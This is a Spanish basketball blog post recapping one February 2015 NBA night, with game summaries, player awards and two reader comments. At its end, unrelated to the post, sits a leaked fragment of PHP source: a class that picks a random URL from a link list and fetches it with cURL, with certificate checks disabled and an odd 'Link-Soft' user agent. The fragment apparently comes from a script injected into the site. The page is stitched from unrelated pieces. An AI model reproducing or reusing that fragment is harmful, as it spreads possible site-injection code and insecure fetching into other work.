La Crónica: Punto y seguido

12 de February de 2015 por txusma

La mayoría de los jugadores de la liga ya pueden comenzar a plantearse (si es que no lo han hecho antes) donde pasar estas mini vacaciones que les supone la celebración de All Star y es que mañana solo se jugarán un par de partidos. Momento de repasar lo que ha dado de sí la primera parte de la temporada y de hacer previsiones para la segunda. Por ejemplo, Cavaliers y Thunder parecen llegan en forma al tramo definitivo de la liga regular mientras que otros equipos, como los Wizards, parecen sucumbir al cansacio. Sin embargo, la noticia del día es la derrota de los Hawks, algo a que no estamos muy acostumbrados.

Repasemos lo que dio de sí la jornada:

 turner_hawks

Atlanta Hawks 88 – Boston Celtics 89

Si uno echa un vistazo al box score del Hawks-Celtics le costará entender cómo se llevaron la victoria los locales. Anotaron menos de un tercio de sus tiros de campo frente al mejor equipo de esta primera mitad de regular season, con permiso de los Warriors, y hay que irse hasta 1965 (¡1965!) para encontrar una victoria de los Celtics con un porcentaje de acierto tan bajo. Pero como, por fortuna, el baloncesto tiene la costumbre de desafiar la lógica, a los Hawks no les bastó con apretar en defensa ni con acumular una renta de 14 puntos a falta de 7:30 para el final. Los Celtics, que ven los Playoffs como una posibilidad muy real, siguieron remando, remontando punto a punto, hasta llegar 1 abajo en la última posesión. Entonces apareció para resolver, como hace unas pocas semanas contra los Blazers, Evan Turner, cuya canasta dio a los Celtics la única ventaja sobre los Hawks en todo el partido. No necesitaron más.

Miami Heat 93 – Cleveland Cavaliers 113

Como un recordatorio para los Heat de lo que fue y ya no es, los Cavs salieron anoche a demostrar que la vida con LeBron James en tus filas es mucho mejor. No necesitan en Miami que nadie se lo recuerde, y suficiente tienen con pelear por una plaza de Playoffs. Sin Wade, todavía de baja, los Heat se vieron atropellados de inicio por la mejor versión de los Cavs, que exhibieron un juego de pase al alcance de pocos equipos. Whiteside volvió a ser el mejor de los Heat pero los interiores de Blatt no encontraron oposición y entre Love, Thompson y Mozgov anotaron 21 de 27 tiros de campo. La baja de Love en la segunda mitad por una lesión ocular no cambió el rumbo del partido, que transitó hacia la bocina final con ventajas para los Cavs de hasta 22 puntos. Con esta victoria, Cleveland alcanza a los Wizards y apunta ya al segundo puesto que ocupan los Raptors.

Washington Wizards 93 – Toronto Raptors 95

Los Raptors siguen sin alcanzar el nivel de diciembre, pero de alguna manera han encadenado tres victorias (y 8 en los últimos 10 partidos) y se asientan en la segunda posición del Este. Especialmente importante fue el triunfo logrado anoche a costa de los Wizards, que acusaron la baja de Beal pero se quedaron a un paso de regresar de Canadá con una victoria. Se los impidió DeRozan con una canasta a 12 segundos para el final. John Wall, el mejor de los capitalinos, erró en sus dos oportunidades para ganar o enviar el partido a la prórroga y los Wizards empiezan a estar más pendientes de los Bucks, que amenazan desde la sexta posición, que de la lucha por la segunda plaza.

Memphis Grizzlies 89 – Oklahoma City Thunder 105

Un auténtico atropello. Eso fue la primera parte. Un parcial de 15-0 poco antes del descanso puso el 60-42 en el marcado y finiquitó el partido. Kevin Durant con 19 puntos y Russell Westbrook con 18 ya habían cumplido con creces su parte ante unos Grizzlies que esta vez no encontraron la forma de pararles. Los Grizzlies lo intentaron en la reanudación pero rápidamente se vio que no er el mejor día de Marc Gasol y Zach Randolph y a falta de unos 5 minutos ya saltaron los suplentes a la cancha a disfrutar de minutos de juego. Los Thunder están ya a media victoria de la octava posición del Oeste que ocupan los Suns y nadie duda ya de que la alcanzarán sin problemas. La gran incógnita es hasta donde llegará su escalada.

El resto de la jornada

Precisamente los Spurs son el equipo que marcha inmediatemente por encima de los Suns en la clasificación. Ayer ganaron a domicilio a los Pistons sin demasiados problemas en su tercer partido consecutivo fuera de casa. Les quedan 6 más (algunos ante rivales durísimos como Warriors, Blazers y Clippers) que acabarán de marcar qué se puede esperar de ellos a final de la liga regular. Sextos en la conferencia son los Clippers que se deshacieron de unos Rockets (cuartos) en los que James Harden estuvo particularmente desacertado. Quintos son los Mavs y terceros los Blazers. Ambos equipos se impusieron a sus respectivos rivales auque los de Texas sudaron más de lo previsto para ganar a los Jazz. En estos momentos los Thunder están a 6 victorias de los Spurs pero no parece descabellado pensar que pueden llegar a meterse en la lucha por la ventaja de campo.

En el Este victorias de Pacers contra Pelicans, de Magic contra los Knicks y de los Bucks sobre los Kings. Tras el All Star vamos a ver una dura lucha entre 6 equipos (7 si los Magic reaccionaran) por dos posiciones de playoffs en el Este porque los Bucks, sextos clasificados, están ya a casi 8 victorias por encima de los Hornets que són séptimos. Sorprende que ningún integrante de la plantilla de Milwaukee acuda al All Star. También se merecen algún tipo de reconocimiento.

 Y que no se nos olvide que los Warriors ganaron a los Wolves sudando la gota gorda. Se aprecia cansancio en el equipo titular de los de la bahía. Y la pareja no tiene fiesta estos días…

PREMIOS

MVP: Hoy vamos a repartir el premio en 3 partes iguales. Por un lado, Kevin Durant y sus 26 puntos (9 de 15 en TC), 10  rebotes, 3 asistencias y 3 tapones; por el otro DeAndre Jordan y su tercer 20-20 en los últimos 6 partidos (24 puntos, 20 rebotes y además 3 robos y 2 tapones). Y todavía queda sitio para Nikola Vucevic y sus 28 puntos y 18 rebotes.

Rookie: Ya dijimos en twitter hace tiempo que Jordan Clarkson se había convertido en el único aliciente para ver a los Lakers. Ayer confirmó esta afirmación con 17 puntos, 6 rebotes y 4 asistencias.

Sorpresa: Las importantes bajas que acumulan los Pelicans y el mal partido de Dante Cunningham han permitido a Luke Babbitt disfrutar de muchos minutos. Hoy ha tenido un buen día y ha acabado con 15 puntos y 8 rebotes. Nick Collison también se ha aprovechado de un partido resuelto en la primera parte y ha acabado con 15 puntos, 9 rebotes y 2 tapones.

Decepción: Tras 2 partidos consecutivos por encima de los 40 puntos, James Harden no llegó a los 10 contra los Clippers. Tampoco fue el mejor día de Marc Gasol (8 puntos con un 2 de 10 en TC y sólo 5 rebotes).

Esfuerzo en vano: La mejor actuación del día (28 puntos, 19 rebotes, 5 asistencias y 4 tapones) no sirvió para que su equipo se llevara la victoria. No es ni la primera vez ni la última que le pasa a Demarcus Cousins.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

2 comentarios a esta entrada

  1. Ruxixón dice:
    #1

    Cómo es posible que hayan ganado los C’s teniendo en cuenta esa estadística…15 tiros de campo más que los Hawks,56 rebotes de los verdes por 44 de los visitantes,con 16 ofensivos de Boston…posiblemente el punto negro de Atlanta sea ese,cuando le dominan holgadamente en el rebote.Cuando hay un Drummond/Monroe enfrente de acuerdo,pero me parece curioso que en Boston hayan sido capaces de sobreparsarles de esa manera.Me alegrare si entran ellos en PO en lugar de Miami o Nets,me parece de mucho mayor valor como está gestionando ese grupo Stevens respecto al potencial superior de las dos plazas comentadas,y eso que a mi lo verde me tira para atrás en los últimos años,será por esa rivalidad que ha tenido que sufrir LeBron en sus carnes.

    Me está sorprendiendo lo de Clippers,pensaba que se vendrían abajo y que caerían ante Dallas y Houston.No sólo no han palmado si no que además han ganado con distancias considerables teniendo en cuenta la entidad del rival en cada caso,y el factor común en ambos encuentros ha sido DeAndre Jordan.Sigo pensando que no es jugador de máximo (ni cerca) ni por asomo,pero con actuaciones así a saber.

      Citar

  2. Nacho dice:
    #2

    Ruxixón:

    Me está sorprendiendo lo de Clippers,pensaba que se vendrían abajo y que caerían ante Dallas y Houston.No sólo no han palmado si no que además han ganado con distancias considerables teniendo en cuenta la entidad del rival en cada caso,y el factor común en ambos encuentros ha sido DeAndre Jordan.Sigo pensando que no es jugador de máximo (ni cerca) ni por asomo,pero con actuaciones asía saber.

    ¡Yo los daba fuera de PO si se descuidaban! Y zas!!! en toda la boca.

    En el Este me molarían que entrasen Celtics y Pistons (o Indiana) y eso que me tiran un poco los Nets, Pero por favor,que la banda de Miami se quede fuera (lo siento por Whiteside)

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>